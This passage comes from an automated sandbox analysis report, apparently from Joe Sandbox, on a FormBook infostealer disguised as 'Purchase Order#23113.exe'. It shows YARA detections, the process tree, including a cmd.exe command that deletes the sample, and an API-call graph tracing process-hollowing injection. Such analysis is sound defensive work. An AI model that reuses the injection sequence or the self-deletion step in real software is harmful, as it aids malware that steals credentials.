                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.1771916843.00000000040C9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.1771916843.00000000040C9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.1771916843.00000000040C9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.1771916843.00000000040C9000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.1771916843.00000000040C9000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          Reputation:low
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:2
                                                                          Start time:10:02:48
                                                                          Start date:08/04/2024
                                                                          Path:C:\Users\user\Desktop\Purchase Order#23113.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\Desktop\Purchase Order#23113.exe"
                                                                          Imagebase:0xbf0000
                                                                          File size:651'272 bytes
                                                                          MD5 hash:FA3E92F061246F3B1625E6F8B8291836
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.1818257514.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1818257514.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1818257514.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.1818257514.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.1818257514.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          Reputation:low
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:3
                                                                          Start time:10:02:48
                                                                          Start date:08/04/2024
                                                                          Path:C:\Windows\explorer.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\Explorer.EXE
                                                                          Imagebase:0x7ff72b770000
                                                                          File size:5'141'208 bytes
                                                                          MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: Windows_Trojan_Formbook_772cc62d, Description: unknown, Source: 00000003.00000002.4209826259.000000000E656000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                          Reputation:high
                                                                          Has exited:false

                                                                          General

                                                                          Target ID:4
                                                                          Start time:10:02:50
                                                                          Start date:08/04/2024
                                                                          Path:C:\Windows\SysWOW64\cscript.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\SysWOW64\cscript.exe"
                                                                          Imagebase:0x700000
                                                                          File size:144'896 bytes
                                                                          MD5 hash:CB601B41D4C8074BE8A84AED564A94DC
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.4199706438.0000000002DA0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4199706438.0000000002DA0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4199706438.0000000002DA0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.4199706438.0000000002DA0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.4199706438.0000000002DA0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.4200202747.0000000004C40000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4200202747.0000000004C40000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4200202747.0000000004C40000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.4200202747.0000000004C40000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.4200202747.0000000004C40000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.4200153899.0000000004C10000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4200153899.0000000004C10000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4200153899.0000000004C10000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.4200153899.0000000004C10000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.4200153899.0000000004C10000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          Reputation:moderate
                                                                          Has exited:false

                                                                          General

                                                                          Target ID:5
                                                                          Start time:10:02:53
                                                                          Start date:08/04/2024
                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:/c del "C:\Users\user\Desktop\Purchase Order#23113.exe"
                                                                          Imagebase:0x240000
                                                                          File size:236'544 bytes
                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:6
                                                                          Start time:10:02:53
                                                                          Start date:08/04/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff7699e0000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Disassembly

                                                                          Reset < >

                                                                            Execution Graph

                                                                            Execution Coverage:10.3%
                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                            Signature Coverage:0%
                                                                            Total number of Nodes:143
                                                                            Total number of Limit Nodes:4
                                                                            execution_graph 27632 142d040 27633 142d086 GetCurrentProcess 27632->27633 27635 142d0d1 27633->27635 27636 142d0d8 GetCurrentThread 27633->27636 27635->27636 27637 142d115 GetCurrentProcess 27636->27637 27638 142d10e 27636->27638 27639 142d14b 27637->27639 27638->27637 27640 142d173 GetCurrentThreadId 27639->27640 27641 142d1a4 27640->27641 27642 142d690 DuplicateHandle 27643 142d726 27642->27643 27790 142acb0 27791 142acbf 27790->27791 27794 142ad97 27790->27794 27802 142ada8 27790->27802 27795 142ad9c 27794->27795 27796 142addc 27795->27796 27810 142b040 27795->27810 27814 142b031 27795->27814 27796->27791 27797 142add4 27797->27796 27798 142afe0 GetModuleHandleW 27797->27798 27799 142b00d 27798->27799 27799->27791 27803 142adb9 27802->27803 27804 142addc 27802->27804 27803->27804 27808 142b040 LoadLibraryExW 27803->27808 27809 142b031 LoadLibraryExW 27803->27809 27804->27791 27805 142add4 27805->27804 27806 142afe0 GetModuleHandleW 27805->27806 27807 142b00d 27806->27807 27807->27791 27808->27805 27809->27805 27811 142b041 27810->27811 27813 142b079 27811->27813 27818 142a130 27811->27818 27813->27797 27815 142b034 27814->27815 27816 142b079 27815->27816 27817 142a130 LoadLibraryExW 27815->27817 27816->27797 27817->27816 27819 142b220 LoadLibraryExW 27818->27819 27821 142b299 27819->27821 27821->27813 27653 7fb759e 27657 7fb7ea0 27653->27657 27669 7fb7e85 27653->27669 27654 7fb75ad 27658 7fb7eba 27657->27658 27659 7fb7ede 27658->27659 27681 7fb87d8 27658->27681 27686 7fb857a 27658->27686 27690 7fb85db 27658->27690 27694 7fb844b 27658->27694 27701 7fb86ab 27658->27701 27706 7fb8405 27658->27706 27710 7fb84a1 27658->27710 27714 7fb837c 27658->27714 27718 7fb82df 27658->27718 27659->27654 27670 7fb7eba 27669->27670 27671 7fb86ab 2 API calls 27670->27671 27672 7fb844b 4 API calls 27670->27672 27673 7fb85db 2 API calls 27670->27673 27674 7fb857a 2 API calls 27670->27674 27675 7fb87d8 2 API calls 27670->27675 27676 7fb82df 2 API calls 27670->27676 27677 7fb7ede 27670->27677 27678 7fb837c 2 API calls 27670->27678 27679 7fb84a1 2 API calls 27670->27679 27680 7fb8405 2 API calls 27670->27680 27671->27677 27672->27677 27673->27677 27674->27677 27675->27677 27676->27677 27677->27654 27678->27677 27679->27677 27680->27677 27682 7fb87e5 27681->27682 27722 7fb6bb8 27682->27722 27726 7fb6bb0 27682->27726 27683 7fb893a 27683->27659 27730 7fb6e02 27686->27730 27734 7fb6e00 27686->27734 27687 7fb85a8 27687->27659 27738 7fb6c68 27690->27738 27742 7fb6c61 27690->27742 27691 7fb85c7 27691->27659 27746 7fb6d42 27694->27746 27750 7fb6d40 27694->27750 27695 7fb8469 27696 7fb833a 27695->27696 27699 7fb6e02 WriteProcessMemory 27695->27699 27700 7fb6e00 WriteProcessMemory 27695->27700 27696->27659 27699->27696 27700->27696 27702 7fb86b1 27701->27702 27704 7fb6e02 WriteProcessMemory 27702->27704 27705 7fb6e00 WriteProcessMemory 27702->27705 27703 7fb833a 27703->27659 27704->27703 27705->27703 27708 7fb6c68 Wow64SetThreadContext 27706->27708 27709 7fb6c61 Wow64SetThreadContext 27706->27709 27707 7fb842c 27707->27659 27708->27707 27709->27707 27712 7fb6e02 WriteProcessMemory 27710->27712 27713 7fb6e00 WriteProcessMemory 27710->27713 27711 7fb833a 27711->27659 27712->27711 27713->27711 27754 7fb6fc8 27714->27754 27757 7fb6ef0 27714->27757 27715 7fb83c3 27715->27659 27761 7fb7088 27718->27761 27765 7fb707d 27718->27765 27719 7fb830f 27719->27659 27723 7fb6bf8 ResumeThread 27722->27723 27725 7fb6c29 27723->27725 27725->27683 27727 7fb6bba ResumeThread 27726->27727 27729 7fb6c29 27727->27729 27729->27683 27731 7fb6e48 WriteProcessMemory 27730->27731 27733 7fb6e9f 27731->27733 27733->27687 27735 7fb6e48 WriteProcessMemory 27734->27735 27737 7fb6e9f 27735->27737 27737->27687 27739 7fb6cad Wow64SetThreadContext 27738->27739 27741 7fb6cf5 27739->27741 27741->27691 27743 7fb6c6a Wow64SetThreadContext 27742->27743 27745 7fb6cf5 27743->27745 27745->27691 27747 7fb6d80 VirtualAllocEx 27746->27747 27749 7fb6dbd 27747->27749 27749->27695 27751 7fb6d80 VirtualAllocEx 27750->27751 27753 7fb6dbd 27751->27753 27753->27695 27755 7fb6f50 ReadProcessMemory 27754->27755 27756 7fb6f7f 27755->27756 27756->27715 27758 7fb6f3b ReadProcessMemory 27757->27758 27760 7fb6f7f 27758->27760 27760->27715 27762 7fb7111 27761->27762 27762->27762 27763 7fb7276 CreateProcessA 27762->27763 27764 7fb72d3 27763->27764 27766 7fb7111 27765->27766 27766->27766 27767 7fb7276 CreateProcessA 27766->27767 27768 7fb72d3 27767->27768 27769 1424668 27770 142467a 27769->27770 27771 1424686 27770->27771 27773 1424778 27770->27773 27774 142477c 27773->27774 27778 1424888 27774->27778 27782 1424879 27774->27782 27780 1424889 27778->27780 27779 142498c 27779->27779 27780->27779 27786 14244c4 27780->27786 27783 142487c 27782->27783 27784 142498c 27783->27784 27785 14244c4 CreateActCtxA 27783->27785 27785->27784 27787 1425918 CreateActCtxA 27786->27787 27789 14259db 27787->27789 27644 7fb9020 27645 7fb9021 27644->27645 27646 7fb91ab 27645->27646 27649 7fb92a0 PostMessageW 27645->27649 27651 7fb9298 PostMessageW 27645->27651 27650 7fb930c 27649->27650 27650->27645 27652 7fb930c 27651->27652 27652->27645

                                                                            Executed Functions

                                                                            Function 05B65D38 Relevance: 8.0, Strings: 6, Instructions: 495COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 297 5b65d38-5b65d63 298 5b65d65 297->298 299 5b65d6a-5b65db2 297->299 298->299 300 5b65db3 299->300 301 5b65dba-5b65dd6 300->301 302 5b65ddf-5b65de0 301->302 303 5b65dd8 301->303 316 5b65e2b-5b65e57 302->316 303->300 303->302 304 5b66033-5b66045 303->304 305 5b65f31-5b65f5a 303->305 306 5b65eff 303->306 307 5b660fd-5b66110 303->307 308 5b6613b 303->308 309 5b65eb9-5b65ecc 303->309 310 5b65ee6-5b65efe 303->310 311 5b66025-5b6602e 303->311 312 5b65de2-5b65dff 303->312 313 5b65fe1-5b65ff2 303->313 314 5b660ae 303->314 315 5b6616a-5b66186 303->315 303->316 317 5b66112 303->317 318 5b65f93-5b65fce 303->318 319 5b65fd3-5b65fdc 303->319 320 5b65f5c-5b65f60 303->320 321 5b660dd-5b660fb 303->321 322 5b65e58 303->322 323 5b65e87-5b65eb7 303->323 324 5b65e01-5b65e29 303->324 325 5b65ece-5b65ee1 303->325 326 5b66188 303->326 408 5b6604b call 5b679c0 304->408 409 5b6604b call 5b679b1 304->409 329 5b65f06-5b65f22 305->329 306->329 328 5b660b5-5b660d1 307->328 332 5b66142-5b6615e 308->332 327 5b65e5f-5b65e7b 309->327 310->306 311->329 312->301 333 5b65ff4-5b66003 313->333 334 5b66005-5b6600c 313->334 314->328 315->332 316->322 317->308 318->329 319->329 330 5b65f62-5b65f71 320->330 331 5b65f73-5b65f7a 320->331 321->328 322->327 323->327 324->301 325->327 351 5b661a3 326->351 352 5b65e84-5b65e85 327->352 353 5b65e7d 327->353 336 5b660d3 328->336 337 5b660da-5b660db 328->337 338 5b65f24 329->338 339 5b65f2b-5b65f2c 329->339 342 5b65f81-5b65f8e 330->342 331->342 343 5b66167-5b66168 332->343 344 5b66160 332->344 349 5b66013-5b66020 333->349 334->349 336->307 336->308 336->314 336->315 336->317 336->321 336->326 336->337 336->351 356 5b662b2-5b662b5 336->356 357 5b661de-5b6624f 336->357 358 5b662fc 336->358 359 5b6640f 336->359 337->317 338->304 338->305 338->306 338->307 338->308 338->311 338->313 338->314 338->315 338->317 338->318 338->319 338->320 338->321 338->326 338->339 339->304 342->329 343->326 344->308 344->315 344->326 344->343 344->351 344->356 344->357 344->358 344->359 360 5b66512-5b66515 call 5b6d938 344->360 361 5b66533-5b6653a 344->361 362 5b6643e-5b664c8 344->362 363 5b6631b-5b66323 344->363 364 5b662e4-5b662f7 344->364 349->329 365 5b661aa-5b661c6 351->365 352->310 353->304 353->305 353->306 353->307 353->308 353->309 353->310 353->311 353->313 353->314 353->315 353->317 353->318 353->319 353->320 353->321 353->322 353->323 353->325 353->326 353->352 414 5b662b8 call 5b6a730 356->414 415 5b662b8 call 5b6a740 356->415 421 5b66255 call 5b6a368 357->421 422 5b66255 call 5b6a358 357->422 416 5b662fe call 7fb8fcf 358->416 417 5b662fe call 7fb8fe0 358->417 410 5b66412 call 5b679c0 359->410 411 5b66412 call 5b679b1 359->411 376 5b6651b-5b6652e 360->376 394 5b664f2 362->394 395 5b664ca-5b664d6 362->395 418 5b66328 call 5b6c020 363->418 419 5b66328 call 5b6c010 363->419 364->365 367 5b661d8-5b661d9 365->367 368 5b661c8 365->368 367->361 368->351 368->356 368->357 368->358 368->359 368->360 368->361 368->362 368->363 368->364 368->367 369 5b66051-5b6605c 377 5b66067-5b660ac 369->377 370 5b66418-5b66439 372 5b662be-5b662df 372->365 373 5b66304-5b66316 373->365 374 5b6632e-5b663d3 412 5b663d9 call 5b6a368 374->412 413 5b663d9 call 5b6a358 374->413 376->365 377->314 377->317 389 5b6625b-5b66268 392 5b66292 389->392 393 5b6626a-5b66276 389->393 398 5b66298-5b662ad 392->398 396 5b66280-5b66286 393->396 397 5b66278-5b6627e 393->397 401 5b664f8-5b6650d 394->401 399 5b664e0-5b664e6 395->399 400 5b664d8-5b664de 395->400 403 5b66290 396->403 397->403 404 5b664f0 399->404 400->404 401->365 403->398 404->401 406 5b663df-5b6640a 406->365 408->369 409->369 410->370 411->370 412->406 413->406 414->372 415->372 416->373 417->373 418->374 419->374 421->389 422->389
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $^q$$^q$$^q$$^q$?7s$?7s
                                                                            • API String ID: 0-2840173270
                                                                            • Opcode ID: 2b13d9dec4cd6d3cf3e624457e8fe45a83c20ad2935e8709ccfaf1dd72fd8d04
                                                                            • Instruction ID: 4f8ada04f51012bb4c4a9850ae296cb4dc3ade9b0b9648ce0012e1e56d020783
                                                                            • Opcode Fuzzy Hash: 2b13d9dec4cd6d3cf3e624457e8fe45a83c20ad2935e8709ccfaf1dd72fd8d04
                                                                            • Instruction Fuzzy Hash: E1221774E14219CFDB64CFA9D984B9DBBB6BB88300F1095AAD40AB7354DB346981CF14
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 05B65D28 Relevance: 4.2, Strings: 3, Instructions: 476COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 471 5b65d28-5b65d63 473 5b65d65 471->473 474 5b65d6a-5b65db2 471->474 473->474 475 5b65db3 474->475 476 5b65dba-5b65dd6 475->476 477 5b65ddf-5b65de0 476->477 478 5b65dd8 476->478 491 5b65e2b-5b65e57 477->491 478->475 478->477 479 5b66033 478->479 480 5b65f31-5b65f5a 478->480 481 5b65eff 478->481 482 5b660fd-5b66110 478->482 483 5b6613b 478->483 484 5b65eb9-5b65ecc 478->484 485 5b65ee6-5b65efe 478->485 486 5b66025-5b6602e 478->486 487 5b65de2-5b65dff 478->487 488 5b65fe1-5b65ff2 478->488 489 5b660ae 478->489 490 5b6616a-5b66186 478->490 478->491 492 5b66112 478->492 493 5b65f93-5b65fce 478->493 494 5b65fd3-5b65fdc 478->494 495 5b65f5c-5b65f60 478->495 496 5b660dd-5b660fb 478->496 497 5b65e58 478->497 498 5b65e87-5b65eb7 478->498 499 5b65e01-5b65e29 478->499 500 5b65ece-5b65ee1 478->500 501 5b66188 478->501 529 5b6603f-5b66045 479->529 504 5b65f06-5b65f22 480->504 481->504 503 5b660b5-5b660d1 482->503 507 5b66142-5b6615e 483->507 502 5b65e5f-5b65e7b 484->502 485->481 486->504 487->476 508 5b65ff4-5b66003 488->508 509 5b66005-5b6600c 488->509 489->503 490->507 491->497 492->483 493->504 494->504 505 5b65f62-5b65f71 495->505 506 5b65f73-5b65f7a 495->506 496->503 497->502 498->502 499->476 500->502 526 5b661a3 501->526 527 5b65e84-5b65e85 502->527 528 5b65e7d 502->528 511 5b660d3 503->511 512 5b660da-5b660db 503->512 513 5b65f24 504->513 514 5b65f2b-5b65f2c 504->514 517 5b65f81-5b65f8e 505->517 506->517 518 5b66167-5b66168 507->518 519 5b66160 507->519 524 5b66013-5b66020 508->524 509->524 511->482 511->483 511->489 511->490 511->492 511->496 511->501 511->512 511->526 531 5b662b2-5b662b5 511->531 532 5b661de-5b661ec 511->532 533 5b662fc 511->533 534 5b6640f 511->534 512->492 513->479 513->480 513->481 513->482 513->483 513->486 513->488 513->489 513->490 513->492 513->493 513->494 513->495 513->496 513->501 513->514 514->479 517->504 518->501 519->483 519->490 519->501 519->518 519->526 519->531 519->532 519->533 519->534 535 5b66512-5b66515 call 5b6d938 519->535 536 5b66533-5b6653a 519->536 537 5b6643e-5b664c8 519->537 538 5b6631b-5b66323 519->538 539 5b662e4-5b662f7 519->539 524->504 540 5b661aa-5b661c6 526->540 527->485 528->479 528->480 528->481 528->482 528->483 528->484 528->485 528->486 528->488 528->489 528->490 528->492 528->493 528->494 528->495 528->496 528->497 528->498 528->500 528->501 528->527 583 5b6604b call 5b679c0 529->583 584 5b6604b call 5b679b1 529->584 589 5b662b8 call 5b6a730 531->589 590 5b662b8 call 5b6a740 531->590 550 5b661f7-5b6623c 532->550 591 5b662fe call 7fb8fcf 533->591 592 5b662fe call 7fb8fe0 533->592 585 5b66412 call 5b679c0 534->585 586 5b66412 call 5b679b1 534->586 551 5b6651b-5b6652e 535->551 569 5b664f2 537->569 570 5b664ca-5b664d6 537->570 593 5b66328 call 5b6c020 538->593 594 5b66328 call 5b6c010 538->594 539->540 542 5b661d8-5b661d9 540->542 543 5b661c8 540->543 542->536 543->526 543->531 543->532 543->533 543->534 543->535 543->536 543->537 543->538 543->539 543->542 544 5b66051-5b6605c 552 5b66067-5b660ac 544->552 545 5b66418-5b66439 547 5b662be-5b662df 547->540 548 5b66304-5b66316 548->540 549 5b6632e-5b66334 554 5b66340-5b663bd 549->554 561 5b66243-5b6624f 550->561 551->540 552->489 552->492 580 5b663c7-5b663d3 554->580 596 5b66255 call 5b6a368 561->596 597 5b66255 call 5b6a358 561->597 564 5b6625b-5b66268 567 5b66292 564->567 568 5b6626a-5b66276 564->568 573 5b66298-5b662ad 567->573 571 5b66280-5b66286 568->571 572 5b66278-5b6627e 568->572 576 5b664f8-5b6650d 569->576 574 5b664e0-5b664e6 570->574 575 5b664d8-5b664de 570->575 578 5b66290 571->578 572->578 579 5b664f0 574->579 575->579 576->540 578->573 579->576 587 5b663d9 call 5b6a368 580->587 588 5b663d9 call 5b6a358 580->588 581 5b663df-5b6640a 581->540 583->544 584->544 585->545 586->545 587->581 588->581 589->547 590->547 591->548 592->548 593->549 594->549 596->564 597->564
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $^q$$^q$?7s
                                                                            • API String ID: 0-2077139018
                                                                            • Opcode ID: ecb6c628e30d770fc581d5b4fc0e50abc61cc451f2decad8a2af845c1eac6cdd
                                                                            • Instruction ID: 1a483d7d4aea5b069c1840c922a5b723127b3ba2ec1f1c95cd1b1ab0d6045802
                                                                            • Opcode Fuzzy Hash: ecb6c628e30d770fc581d5b4fc0e50abc61cc451f2decad8a2af845c1eac6cdd
                                                                            • Instruction Fuzzy Hash: 2A221574E14219CFDB64CFA9D985B9DBBB2FB88300F10D5AAD40AA7354DB34A981CF14
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 05B6612C Relevance: 2.7, Strings: 2, Instructions: 227COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 663 5b6612c-5b66139 667 5b6613b 663->667 668 5b66188 663->668 669 5b66142-5b6615e 667->669 670 5b661a3 668->670 671 5b66167-5b66168 669->671 672 5b66160 669->672 683 5b661aa-5b661c6 670->683 671->668 672->667 672->668 672->670 672->671 673 5b662b2-5b662b5 672->673 674 5b66512-5b66515 call 5b6d938 672->674 675 5b66533-5b6653a 672->675 676 5b661de-5b661ec 672->676 677 5b6643e-5b664c8 672->677 678 5b662fc 672->678 679 5b6631b-5b66323 672->679 680 5b662e4-5b662f7 672->680 681 5b6640f 672->681 682 5b6616a-5b66186 672->682 731 5b662b8 call 5b6a730 673->731 732 5b662b8 call 5b6a740 673->732 692 5b6651b-5b6652e 674->692 691 5b661f7-5b6623c 676->691 706 5b664f2 677->706 707 5b664ca-5b664d6 677->707 722 5b662fe call 7fb8fcf 678->722 723 5b662fe call 7fb8fe0 678->723 724 5b66328 call 5b6c020 679->724 725 5b66328 call 5b6c010 679->725 680->683 726 5b66412 call 5b679c0 681->726 727 5b66412 call 5b679b1 681->727 682->669 684 5b661d8-5b661d9 683->684 685 5b661c8 683->685 684->675 685->670 685->673 685->674 685->675 685->676 685->677 685->678 685->679 685->680 685->681 685->684 686 5b66304-5b66316 686->683 688 5b6632e-5b66334 694 5b66340-5b663bd 688->694 689 5b66418-5b66439 701 5b66243-5b6624f 691->701 692->683 693 5b662be-5b662df 693->683 719 5b663c7-5b663d3 694->719 728 5b66255 call 5b6a368 701->728 729 5b66255 call 5b6a358 701->729 704 5b6625b-5b66268 708 5b66292 704->708 709 5b6626a-5b66276 704->709 714 5b664f8-5b6650d 706->714 710 5b664e0-5b664e6 707->710 711 5b664d8-5b664de 707->711 715 5b66298-5b662ad 708->715 712 5b66280-5b66286 709->712 713 5b66278-5b6627e 709->713 717 5b664f0 710->717 711->717 718 5b66290 712->718 713->718 714->683 717->714 718->715 733 5b663d9 call 5b6a368 719->733 734 5b663d9 call 5b6a358 719->734 720 5b663df-5b6640a 720->683 722->686 723->686 724->688 725->688 726->689 727->689 728->704 729->704 731->693 732->693 733->720 734->720
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $^q$$^q
                                                                            • API String ID: 0-355816377
                                                                            • Opcode ID: d90033c0010514e09300528d8a6f4868a40e0072c36004c7d8a0ad70ec437da3
                                                                            • Instruction ID: ba78893002d7168b36d301bf5b032588920e5240038c458ddf1bd9430c459c07
                                                                            • Opcode Fuzzy Hash: d90033c0010514e09300528d8a6f4868a40e0072c36004c7d8a0ad70ec437da3
                                                                            • Instruction Fuzzy Hash: 5CB1F774E10219CFDB64CFA5C944BADBBB6FB88300F2095AAD409A7358DB346D85CF54
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 05B66117 Relevance: 2.7, Strings: 2, Instructions: 223COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 735 5b66117-5b66139 737 5b6613b 735->737 738 5b66188 735->738 739 5b66142-5b6615e 737->739 740 5b661a3 738->740 741 5b66167-5b66168 739->741 742 5b66160 739->742 753 5b661aa-5b661c6 740->753 741->738 742->737 742->738 742->740 742->741 743 5b662b2-5b662b5 742->743 744 5b66512-5b66515 call 5b6d938 742->744 745 5b66533-5b6653a 742->745 746 5b661de-5b661ec 742->746 747 5b6643e-5b664c8 742->747 748 5b662fc 742->748 749 5b6631b-5b66323 742->749 750 5b662e4-5b662f7 742->750 751 5b6640f 742->751 752 5b6616a-5b66186 742->752 803 5b662b8 call 5b6a730 743->803 804 5b662b8 call 5b6a740 743->804 762 5b6651b-5b6652e 744->762 761 5b661f7-5b6623c 746->761 776 5b664f2 747->776 777 5b664ca-5b664d6 747->777 794 5b662fe call 7fb8fcf 748->794 795 5b662fe call 7fb8fe0 748->795 796 5b66328 call 5b6c020 749->796 797 5b66328 call 5b6c010 749->797 750->753 798 5b66412 call 5b679c0 751->798 799 5b66412 call 5b679b1 751->799 752->739 754 5b661d8-5b661d9 753->754 755 5b661c8 753->755 754->745 755->740 755->743 755->744 755->745 755->746 755->747 755->748 755->749 755->750 755->751 755->754 756 5b66304-5b66316 756->753 758 5b6632e-5b66334 764 5b66340-5b663bd 758->764 759 5b66418-5b66439 771 5b66243-5b6624f 761->771 762->753 763 5b662be-5b662df 763->753 789 5b663c7-5b663d3 764->789 800 5b66255 call 5b6a368 771->800 801 5b66255 call 5b6a358 771->801 774 5b6625b-5b66268 778 5b66292 774->778 779 5b6626a-5b66276 774->779 784 5b664f8-5b6650d 776->784 780 5b664e0-5b664e6 777->780 781 5b664d8-5b664de 777->781 785 5b66298-5b662ad 778->785 782 5b66280-5b66286 779->782 783 5b66278-5b6627e 779->783 787 5b664f0 780->787 781->787 788 5b66290 782->788 783->788 784->753 787->784 788->785 792 